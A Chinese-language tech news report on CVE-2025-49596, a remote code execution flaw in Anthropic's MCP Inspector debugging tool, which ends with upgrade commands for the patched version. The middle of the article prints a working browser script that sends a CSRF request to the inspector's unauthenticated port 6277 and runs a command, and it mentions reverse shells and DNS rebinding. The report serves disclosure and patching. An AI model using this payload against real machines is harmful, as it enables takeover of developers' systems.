MCP 是人工智能公司 Anthropic 開源的協(xié)議，借助該協(xié)議開發(fā)者可以將人工智能連接多個外部數(shù)據(jù)源以獲取更準(zhǔn)確的數(shù)據(jù)并給出更有針對性的回答，目前已經(jīng)有不少 AI 服務(wù)都已經(jīng)支持 MCP 協(xié)議。

如果開發(fā)者要調(diào)試 MCP 協(xié)議則需要使用 Anthropic 開源的 MCP Inspector 檢查器，這個檢查器主要用于測試和調(diào)試 MCP 服務(wù)器，其用戶群也主要都是開發(fā)者們。

網(wǎng)絡(luò)安全研究公司 OLIGO 在 MCP 檢查器中發(fā)現(xiàn)高危安全漏洞，借助該漏洞攻擊者可以遠(yuǎn)程執(zhí)行任意代碼并在開發(fā)者機器上獲得完全訪問權(quán)，漏洞編號 CVE-2025-49596，漏洞評分高達(dá) 9.4 分。

MCP 檢查器中的致命弱點：

MCP 通信框架旨在連接 AI 代理和工具并促進實時協(xié)作和操作，MCP 服務(wù)器通過 API 實現(xiàn)系統(tǒng)間的交互，MCP Inspector 檢查器則是調(diào)試工具，包含兩個核心組件：

MCP Inspector Client：基于 React 的 Web 界面，主要用于測試和調(diào)試 MCP 服務(wù)器

MCP Proxy：基于 Node.js 的協(xié)議橋，連接 Web 界面和 MCP 服務(wù)器，支持多種傳輸方式

研究人員發(fā)現(xiàn) MCP 檢查器的默認(rèn)配置存在嚴(yán)重安全隱患，工具通過執(zhí)行 mcp dev 命令后運行并默認(rèn)啟動 HTTP 服務(wù)器和監(jiān)聽 6277 端口，但這個 HTTP 服務(wù)器沒有必要的身份驗證和加密措施。

當(dāng)受害者訪問特制的惡意網(wǎng)站時，攻擊者可以通過瀏覽器向本地 MCP 服務(wù)器發(fā)送惡意請求，利用 0.0.0.0/127.0.0.1 發(fā)送請求或 DNS 重綁定，觸發(fā)任意代碼執(zhí)行，進而竊取數(shù)據(jù)、植入后門或在內(nèi)網(wǎng)中橫向移動。

此次發(fā)現(xiàn)的漏洞主要涉及 MCP 檢查器的 SSE 端點，攻擊者可以通過跨站請求偽造 (CSRF) 觸發(fā)遠(yuǎn)程代碼執(zhí)行，下面是典型的攻擊示例：

<script> fetch?("http://0.0.0.0:6277/sse?transportType=stdio&command=touch&args=%2Ftmp%2Fexploited-from-the-browser",?{ ????"headers":?{ ????????"accept":?"*/*", ????????"accept-language":?"en-US,en;q=0.9", ????????"cache-control":?"no-cache", ????????"pragma":?"no-cache" ????}, ????"referrer":?"http://127.0.0.1:6274/", ????"referrerPolicy":?"strict-origin-when-cross-origin", ????"body":?null, ????"method":?"GET", ????"mode":?"no-cors", ????"credentials":?"omit" }) </script>

這個攻擊示例通過 0.0.0.0:6277 向 MCP 檢查器發(fā)送請求并觸發(fā) touch /tmp/exploited-from-the-browser 命令并在目標(biāo)設(shè)備上創(chuàng)建文件，攻擊者還可以執(zhí)行更危險的命令，例如打開反向 Shell 并獲取設(shè)備的完整控制權(quán)。

若利用 DNS 重綁定技術(shù)則可以通過惡意 DNS 請求重定向到 0.0.0.0:6277 或 127.0.0.1:6277 并擴大攻擊范圍，更糟糕的是部分 MCP 檢查器實例還直接暴露在公網(wǎng)上，其獨特的指紋響應(yīng)可以讓攻擊者輕松定位目標(biāo)并實施遠(yuǎn)程代碼執(zhí)行。

獲取新版本：

目前 Anthropic 已經(jīng)發(fā)布 MCP 檢查器 0.14.1 版修復(fù)該漏洞并更新相關(guān)文檔，強調(diào)服務(wù)器不應(yīng)該暴露在不受信任的網(wǎng)絡(luò)中，官方建議開發(fā)者僅在 localhost 上運行 MCP 檢查器避免將其暴露在公網(wǎng)或局域網(wǎng)。

現(xiàn)有的 MCP 檢查器實例必須手動更新到最新版本，具體可以通過以下命令檢查和更新：

~/?npm?list?-g? ├──?@modelcontextprotocol/inspector@0.10.0? ~/?npm?install?-g?"@modelcontextprotocol/inspector@^0.14.1"

? ? ? ? ? ?

[超站]友情鏈接：

四季很好，只要有你，文娛排行榜：https://www.yaopaiming.com/
關(guān)注數(shù)據(jù)與安全，洞悉企業(yè)級服務(wù)市場：https://www.ijiandao.com/